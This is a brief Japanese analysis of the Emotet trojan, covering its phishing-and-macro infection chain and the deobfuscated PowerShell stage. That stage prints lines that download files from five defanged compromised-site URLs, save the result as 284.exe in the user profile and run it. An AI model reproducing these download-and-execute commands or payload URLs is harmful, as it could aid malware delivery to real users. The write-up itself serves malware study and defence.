Emotet マルウェアの分析

Emotetとは？

• 主にメールを通じて拡散されるトロイの木馬
• 正規のメールのように偽装し、ユーザーに悪意のあるファイルをクリックさせる手法
• トロイの木馬を更新し、システムにアクセスを確立した後、運営者が追加ペイロードをダウンロードできるようにする「ローダー」型のマルウェア
• 感染したホストから銀行の資格情報を盗む、被害者から金銭を搾取することを目的に動作
  

Emotet 実行/分析

1. ソーシャルエンジニアリング手法を用いて攻撃対象にメールを送信

2. 攻撃対象が疑わず添付ファイルをダウンロード

3. ファイルを開き、マクロを実行するため「コンテンツの有効化」をクリック

4. Base64でエンコードされたコードがPowerShellプロセスで実行される

5. PowerShellコマンドによってconhostが実行

6. PowerShellスクリプトコードの実行

7. PowerShellスクリプトコードの分析

1. 以下のURLからファイルをダウンロード new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxp://blockchainjoblist.com/wp-admin/014080/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://womenempowermentpakistan.com/wp-admin/paba5q52/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://atnimanvilla.com/wp-content/073735/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://yeuquynhnhai.com/upload/41830/) new-object NeT.wEBClIEnt DOwNlOaDfiLe(hxxps://deepikarai.com/js/4bzs6/)

2. 以下のパスにファイルを保存 $env:userprofile\284.exe

3. 23931バイト以上の場合実行 (Get-Item $env:userprofile\284.exe).LeNgTh -ge 23931

8. ユーザーフォルダーにファイル生成

[参考]

• https://en.wikipedia.org/wiki/Emotet
  
• https://www.malwarebytes.com/emotet